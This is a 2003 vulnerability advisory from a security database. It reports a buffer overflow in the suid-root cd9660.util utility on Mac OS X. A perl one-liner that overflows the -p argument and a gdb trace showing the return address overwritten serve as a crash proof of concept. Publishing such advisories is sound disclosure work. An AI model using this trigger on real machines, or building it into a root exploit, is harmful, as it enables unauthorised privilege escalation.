Buffer overflow/privilege escalation in MacOS X

2003-12-16T00:00:00
ID SECURITYVULNS:DOC:5534
Type securityvulns
Reporter Securityvulns
Modified 2003-12-16T00:00:00

Description

Hi,

It appears that parts of MacOSX that didn't come from BSD are not very well written and have significant security issues.

An example is a /System/Library/Filesystems/cd9660.fs/cd9660.util utility. It is suid root and it is vulnerable to a classic buffer overflow due to the lack of input validation.

Demonstration:

sdsx:/System/Library/Filesystems/cd9660.fs max$ ls -la cd9660.util -rwsr-xr-x 1 root wheel 20476 23 Sep 23:53 cd9660.util

sdsx:/System/Library/Filesystems/cd9660.fs max$ ./cd9660.util -p `perl -e "print 'A'x512"` Segmentation fault

sdsx:/System/Library/Filesystems/cd9660.fs root# gdb -core /cores/core.1405 ./cd9660.util [gdb banner here] Reading symbols for shared libraries .... done Core was generated by `./cd9660.util'.

0 0x9000d360 in strcat ()

(gdb) where

0 0x9000d360 in strcat ()

1 0x00002b84 in main ()

2 0x41414141 in ?? ()

Thanks,

Max.